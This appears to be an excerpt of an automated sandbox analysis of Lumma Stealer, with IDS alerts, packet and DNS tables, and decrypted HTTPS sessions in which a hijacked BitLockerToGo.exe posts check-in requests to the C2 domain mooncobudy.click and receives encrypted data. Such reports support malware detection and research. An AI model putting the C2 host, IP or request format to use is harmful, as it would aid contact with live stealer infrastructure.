                                                                              2025-01-07T13:19:45.302126+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.349973188.114.97.3443TCP
                                                                              2025-01-07T13:19:45.306719+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.349973188.114.97.3443TCP
                                                                              2025-01-07T13:19:47.239277+01002058716ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI)1192.168.2.349983188.114.97.3443TCP
                                                                              2025-01-07T13:19:47.239277+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.349983188.114.97.3443TCP

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 7, 2025 13:19:35.267806053 CET49913443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:35.267834902 CET44349913188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:35.267932892 CET49913443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:35.274135113 CET49913443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:35.274148941 CET44349913188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:35.825644970 CET44349913188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:35.825750113 CET49913443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:35.827615023 CET49913443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:35.827622890 CET44349913188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:35.827960014 CET44349913188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:35.879734039 CET49913443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:35.936269045 CET49913443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:35.936296940 CET49913443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:35.936392069 CET44349913188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:36.324762106 CET44349913188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:36.324856043 CET44349913188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:36.324980974 CET49913443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:36.495328903 CET49913443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:36.495352030 CET44349913188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:36.653846025 CET49919443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:36.653894901 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:36.653984070 CET49919443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:36.654270887 CET49919443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:36.654299974 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.138447046 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.138526917 CET49919443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:37.139898062 CET49919443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:37.139925957 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.140181065 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.141724110 CET49919443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:37.141760111 CET49919443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:37.141815901 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.895795107 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.895849943 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.895889997 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.895919085 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.895965099 CET49919443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:37.895996094 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.896017075 CET49919443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:37.896492004 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.896526098 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.896599054 CET49919443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:37.896609068 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.896681070 CET49919443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:37.896858931 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.900449991 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.900485992 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.900576115 CET49919443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:37.900584936 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.900661945 CET49919443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:37.988063097 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.988126993 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.988204956 CET49919443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:37.988215923 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.988229036 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.988286972 CET49919443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:37.988480091 CET49919443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:37.988500118 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:37.988512039 CET49919443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:37.988518000 CET44349919188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:38.252373934 CET49930443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:38.252427101 CET44349930188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:38.252691984 CET49930443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:38.253298998 CET49930443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:38.253313065 CET44349930188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:38.727850914 CET44349930188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:38.728022099 CET49930443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:38.729603052 CET49930443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:38.729615927 CET44349930188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:38.729892015 CET44349930188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:38.731082916 CET49930443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:38.731199026 CET49930443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:38.731237888 CET44349930188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:40.205178976 CET44349930188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:40.205297947 CET44349930188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:40.205398083 CET49930443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:40.205662012 CET49930443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:40.205678940 CET44349930188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:40.355560064 CET49944443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:40.355606079 CET44349944188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:40.355703115 CET49944443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:40.356092930 CET49944443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:40.356110096 CET44349944188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:40.827914953 CET44349944188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:40.827989101 CET49944443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:40.829509974 CET49944443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:40.829529047 CET44349944188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:40.829773903 CET44349944188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:40.831537008 CET49944443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:40.831679106 CET49944443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:40.831705093 CET44349944188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:41.479049921 CET44349944188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:41.479137897 CET44349944188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:41.479238987 CET49944443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:41.479687929 CET49944443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:41.479710102 CET44349944188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:41.700663090 CET49951443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:41.700685978 CET44349951188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:41.700778008 CET49951443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:41.701147079 CET49951443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:41.701159000 CET44349951188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:42.154330015 CET44349951188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:42.154407024 CET49951443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:42.155730963 CET49951443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:42.155738115 CET44349951188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:42.155972958 CET44349951188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:42.157370090 CET49951443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:42.157538891 CET49951443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:42.157602072 CET44349951188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:42.157697916 CET49951443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:42.157706022 CET44349951188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:42.768879890 CET44349951188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:42.768971920 CET44349951188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:42.769085884 CET49951443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:42.769340992 CET49951443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:42.769356012 CET44349951188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:43.313642979 CET49963443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:43.313680887 CET44349963188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:43.313782930 CET49963443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:43.314148903 CET49963443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:43.314158916 CET44349963188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:43.788938999 CET44349963188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:43.789032936 CET49963443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:43.790307999 CET49963443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:43.790319920 CET44349963188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:43.790565014 CET44349963188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:43.791837931 CET49963443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:43.791950941 CET49963443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:43.791955948 CET44349963188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:44.281821966 CET44349963188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:44.281912088 CET44349963188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:44.282397985 CET49963443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:44.282525063 CET49963443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:44.282541990 CET44349963188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:44.844602108 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:44.844654083 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:44.844820023 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:44.845093012 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:44.845114946 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.302040100 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.302125931 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.303539991 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.303560972 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.303796053 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.305233002 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.306263924 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.306308985 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.306405067 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.306444883 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.306516886 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.306559086 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.306600094 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.306740999 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.306771994 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.306902885 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.306941986 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.307079077 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.307105064 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.316452026 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.316803932 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.316837072 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.316859007 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.316894054 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.317001104 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.317039013 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.317059040 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.320377111 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.320586920 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.320628881 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:45.320652962 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.320677042 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:45.322113991 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:46.950628996 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:46.950726986 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:46.950823069 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:46.950922966 CET49973443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:46.950947046 CET44349973188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:46.973050117 CET49983443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:46.973084927 CET44349983188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:46.973207951 CET49983443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:46.973715067 CET49983443192.168.2.3188.114.97.3
                                                                              Jan 7, 2025 13:19:46.973726988 CET44349983188.114.97.3192.168.2.3
                                                                              Jan 7, 2025 13:19:47.239276886 CET49983443192.168.2.3188.114.97.3

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 7, 2025 13:19:35.249464035 CET5318453192.168.2.31.1.1.1
                                                                              Jan 7, 2025 13:19:35.260907888 CET53531841.1.1.1192.168.2.3

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Jan 7, 2025 13:19:35.249464035 CET192.168.2.31.1.1.10xa9fcStandard query (0)mooncobudy.clickA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Jan 7, 2025 13:19:01.720429897 CET1.1.1.1192.168.2.30xc28bNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 7, 2025 13:19:01.720429897 CET1.1.1.1192.168.2.30xc28bNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                              Jan 7, 2025 13:19:35.260907888 CET1.1.1.1192.168.2.30xa9fcNo error (0)mooncobudy.click188.114.97.3A (IP address)IN (0x0001)false
                                                                              Jan 7, 2025 13:19:35.260907888 CET1.1.1.1192.168.2.30xa9fcNo error (0)mooncobudy.click188.114.96.3A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • mooncobudy.click

                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.349913188.114.97.34437912C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-07 12:19:35 UTC263OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 8
                                                                              Host: mooncobudy.click
                                                                              2025-01-07 12:19:35 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                              Data Ascii: act=life
                                                                              2025-01-07 12:19:36 UTC1123INHTTP/1.1 200 OK
                                                                              Date: Tue, 07 Jan 2025 12:19:36 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=2vuebsattpctvm6bo71m4q91d0; expires=Sat, 03 May 2025 06:06:15 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mf0srxLIppZFmCYzrxIj4bslnSJkHeqXsoxsM36bY%2FclGU5aNIm6ppFs78WOoI3bFdDrQosOj%2B5rK2%2BZINqrh0P%2BLgSTV14M1pe1OnmRf4rIq4cqlDvYGLgHFKamhBBKvj5A"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fe3e5a5ef7a19a1-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1946&min_rtt=1940&rtt_var=740&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1466599&cwnd=118&unsent_bytes=0&cid=2da5f7e01512df40&ts=572&x=0"
                                                                              2025-01-07 12:19:36 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                              Data Ascii: 2ok
                                                                              2025-01-07 12:19:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.349919188.114.97.34437912C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-07 12:19:37 UTC264OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 48
                                                                              Host: mooncobudy.click
                                                                              2025-01-07 12:19:37 UTC48OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4a 77 71 75 6c 6e 2d 2d 33 31 31 32 59 54 26 6a 3d
                                                                              Data Ascii: act=recive_message&ver=4.0&lid=Jwquln--3112YT&j=
                                                                              2025-01-07 12:19:37 UTC1121INHTTP/1.1 200 OK
                                                                              Date: Tue, 07 Jan 2025 12:19:37 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=bn2v9a1maljn6sm375gqv2rv2m; expires=Sat, 03 May 2025 06:06:16 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T0rVQkhLLp%2FQ1IM4vp9bQQh2Hnl7oJBfPrTEyYorcrukdI48%2BxCKKMQ%2FlwrkJLsCudshUGPTmsuPonJ2rOy4aNv2SA350AIyJY0fRITaUGN7n8nqYl8L7HGKbdrd1zNkbxKC"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fe3e5ad9ad30f84-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1482&min_rtt=1471&rtt_var=573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=948&delivery_rate=1872995&cwnd=244&unsent_bytes=0&cid=5a5907987e4f4852&ts=764&x=0"
                                                                              2025-01-07 12:19:37 UTC248INData Raw: 31 34 37 64 0d 0a 37 61 4a 32 68 78 54 78 50 68 34 58 4f 68 6f 36 6d 6e 61 4f 4c 65 48 30 48 79 69 70 79 70 33 77 48 59 59 4f 35 69 74 75 67 7a 69 57 67 41 43 6c 4c 73 55 53 50 47 52 66 4f 41 44 75 42 50 74 49 7a 64 5a 2b 54 49 76 77 2b 35 46 78 39 57 76 4b 43 52 6a 75 47 74 66 45 46 2b 74 6e 6c 42 49 38 63 6b 49 34 41 4d 45 4e 72 45 69 50 31 69 55 4b 7a 4b 44 2f 6b 58 48 6b 62 34 31 45 48 75 39 62 68 63 34 52 37 33 47 53 57 6e 39 37 56 33 39 66 2f 78 66 6b 51 34 69 5a 64 30 57 4c 35 72 2b 56 5a 36 51 30 78 47 59 4c 39 31 6d 67 77 77 58 73 4e 6f 77 53 5a 54 56 66 64 42 69 67 56 4f 39 49 67 35 68 35 54 4d 4b 69 39 5a 68 35 35 57 71 4d 57 77 66 6c 55 49 58 41 45 75 35 37 6d 30 35 79 63 56 42 30 57 66 55 58 72 41 48 44 6b 57 55 4b 6b 2b
                                                                              Data Ascii: 147d7aJ2hxTxPh4XOho6mnaOLeH0Hyipyp3wHYYO5itugziWgAClLsUSPGRfOADuBPtIzdZ+TIvw+5Fx9WvKCRjuGtfEF+tnlBI8ckI4AMENrEiP1iUKzKD/kXHkb41EHu9bhc4R73GSWn97V39f/xfkQ4iZd0WL5r+VZ6Q0xGYL91mgwwXsNowSZTVfdBigVO9Ig5h5TMKi9Zh55WqMWwflUIXAEu57m05ycVB0WfUXrAHDkWUKk+
                                                                              2025-01-07 12:19:37 UTC1369INData Raw: 69 73 6f 48 7a 31 66 5a 46 45 48 4f 63 61 6b 49 34 4e 70 58 47 66 48 43 51 31 55 48 52 57 2f 52 66 6a 53 49 4b 57 62 30 58 4c 71 2f 65 61 65 2b 35 6a 69 30 59 43 36 31 32 48 79 52 50 71 63 5a 74 61 63 33 59 59 4e 68 6a 2f 44 4b 77 58 77 37 5a 74 53 63 69 38 38 6f 4d 2f 2b 79 4b 64 43 51 76 74 47 74 65 41 45 75 74 33 6e 6c 78 75 66 56 4e 7a 58 65 6f 66 35 55 4b 4f 6c 6e 42 41 78 4b 76 2f 6c 58 58 75 59 34 35 4e 41 65 78 63 6a 38 42 55 71 7a 61 55 52 44 77 74 47 46 74 64 36 42 50 67 57 63 47 73 50 56 57 46 73 62 2b 56 63 36 51 30 78 45 45 4a 34 6c 6d 45 7a 78 66 74 66 59 46 63 62 6e 4e 56 66 55 72 2b 45 65 4a 46 67 49 52 33 52 4d 32 72 39 70 6c 32 34 57 75 41 43 55 4b 68 58 5a 65 41 54 4b 56 58 6e 6c 64 77 66 30 39 34 47 4f 64 61 39 51 2b 45 6d 6a 30 53 69
                                                                              Data Ascii: isoHz1fZFEHOcakI4NpXGfHCQ1UHRW/RfjSIKWb0XLq/eae+5ji0YC612HyRPqcZtac3YYNhj/DKwXw7ZtSci88oM/+yKdCQvtGteAEut3nlxufVNzXeof5UKOlnBAxKv/lXXuY45NAexcj8BUqzaURDwtGFtd6BPgWcGsPVWFsb+Vc6Q0xEEJ4lmEzxftfYFcbnNVfUr+EeJFgIR3RM2r9pl24WuACUKhXZeATKVXnldwf094GOda9Q+Emj0Si
                                                                              2025-01-07 12:19:37 UTC1369INData Raw: 2f 71 69 79 44 55 55 79 35 47 71 58 44 41 4f 5a 38 30 57 6c 2f 65 31 5a 2f 54 72 67 4c 6f 6c 62 44 6b 58 45 4b 6b 2b 6a 79 6b 33 66 69 66 6f 74 45 44 2b 39 55 67 4d 55 62 37 58 61 54 55 58 6c 78 55 33 4e 62 39 52 44 2b 52 59 4f 65 65 45 76 42 6f 72 2f 63 50 2b 4e 30 78 42 46 4d 30 45 32 45 67 69 48 6d 65 4a 31 62 61 6a 56 48 4e 6b 47 34 45 2b 41 50 32 39 5a 77 51 73 36 74 38 4a 4e 31 36 6d 6d 4f 52 51 54 76 57 5a 33 50 45 4f 56 36 6d 31 5a 78 65 31 78 77 55 66 4d 66 36 6b 2b 43 6e 44 30 45 69 36 2f 6e 30 69 65 6b 57 49 4e 46 41 65 34 59 75 73 4d 61 36 33 47 46 48 47 4d 37 51 54 68 66 39 46 53 30 44 34 2b 66 66 55 48 42 72 50 2b 56 63 75 46 76 67 30 6f 42 35 6c 43 42 78 78 44 70 66 35 35 61 66 48 4a 63 66 55 72 39 48 65 42 44 77 39 67 39 54 64 50 6f 70 39
                                                                              Data Ascii: /qiyDUUy5GqXDAOZ80Wl/e1Z/TrgLolbDkXEKk+jyk3fifotED+9UgMUb7XaTUXlxU3Nb9RD+RYOeeEvBor/cP+N0xBFM0E2EgiHmeJ1bajVHNkG4E+AP29ZwQs6t8JN16mmORQTvWZ3PEOV6m1Zxe1xwUfMf6k+CnD0Ei6/n0iekWINFAe4YusMa63GFHGM7QThf9FS0D4+ffUHBrP+VcuFvg0oB5lCBxxDpf55afHJcfUr9HeBDw9g9TdPop9
